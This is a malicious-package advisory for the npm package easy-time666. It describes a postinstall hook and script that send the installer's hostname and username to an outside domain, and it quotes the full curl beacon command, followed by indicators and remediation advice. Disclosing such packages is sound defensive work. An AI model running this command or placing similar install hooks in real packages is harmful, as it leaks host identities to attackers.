MAL-2026-5749

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/easy-time666/MAL-2026-5749.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5749
Aliases
  • GHSA-wfff-g64j-qx73
Published
2026-06-13T12:23:35Z
Modified
2026-06-25T07:46:22Z
Summary
Malicious code in easy-time666 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22)

package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami) over plain HTTP on every npm install, leaking the installer's hostname and current username to a non-publisher domain. The package advertises itself as a time-formatting library and has no legitimate reason to phone home with host identifiers. A second file, scripts/postinstall.js, is shipped in the tarball and POSTs JSON {ping:'npm'} to the same host (npm.wdf1.eyes.sh) over plain HTTP, reinforcing the install-time callback. This is the canonical recon-beacon pattern used to enumerate compromised hosts before staging follow-on payloads.

Source: ghsa-malware (ce8b04c425e8212c5a2a197092fe1890a5bc3d3ce8bd8dabb145c8b5c9c8cf8e)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Source: ossf-package-analysis (6d4d0f8dc97023a33bc4928ce119e7001f5233f8b7fda31afffeb9dbb3ba9cdf)

The OpenSSF Package Analysis project identified 'easy-time666' @ 1.0.0 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006401",
            "import_time": "2026-06-13T21:32:33.419183943Z",
            "modified_time": "2026-06-13T21:05:45Z",
            "sha256": "57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22",
            "source": "amazon-inspector",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-006402",
            "import_time": "2026-06-13T21:32:33.461749961Z",
            "modified_time": "2026-06-13T21:05:45Z",
            "sha256": "8d01edd925624ba53c0b659eab068e8252c70d276315c8074962dd29bdf9dd6c",
            "source": "amazon-inspector",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "import_time": "2026-06-14T22:30:00.571098944Z",
            "modified_time": "2026-06-13T12:23:35Z",
            "sha256": "6d4d0f8dc97023a33bc4928ce119e7001f5233f8b7fda31afffeb9dbb3ba9cdf",
            "source": "ossf-package-analysis",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "id": "GHSA-wfff-g64j-qx73",
            "import_time": "2026-06-25T07:29:46.490571256Z",
            "modified_time": "2026-06-25T05:49:07Z",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "sha256": "ce8b04c425e8212c5a2a197092fe1890a5bc3d3ce8bd8dabb145c8b5c9c8cf8e",
            "source": "ghsa-malware"
        }
    ]
}
References
Credits

Affected packages

npm / easy-time666

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected

Affected versions

1.*
1.0.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "85b5d603a544263b411cef0a4a2e47681008adbfa0abe529dc19262039978ee2",
            "tlsh": "b411ba24cc308c5315c5a28aada881c3efa044878948f848b3da44ad8b4d63f11fdb2e"
        },
        {
            "path": "scripts/postinstall.js",
            "sha256": "66713e0d80898dde7ff350e1d0e4961de5f4d200f9a1c0c68c32a4034d504f0f",
            "tlsh": "cbe068f264b267610fbe91c8e0d48c069131d014f10b4cd0aac407ad2acd2ed98719d8"
        }
    ],
    "ips": [
        "172.104.163.125",
        "104.16.9.34"
    ],
    "package_integrity": [
        {
            "filename": "easy-time666-1.0.0.tgz",
            "hashes": {
                "sha1": "443891d17ec301280f0fefebeffb568fa2708e0f",
                "sha512_sri": "sha512-+xof7RphrJ0S3vKhaKG0ZyzZQdlwkf2JJBGrfw08k8KlPvq2Xf0GgkbChcdT5Rt6edDjKZ/mzYNNSG9IPhc9JA=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/easy-time666/MAL-2026-5749.json"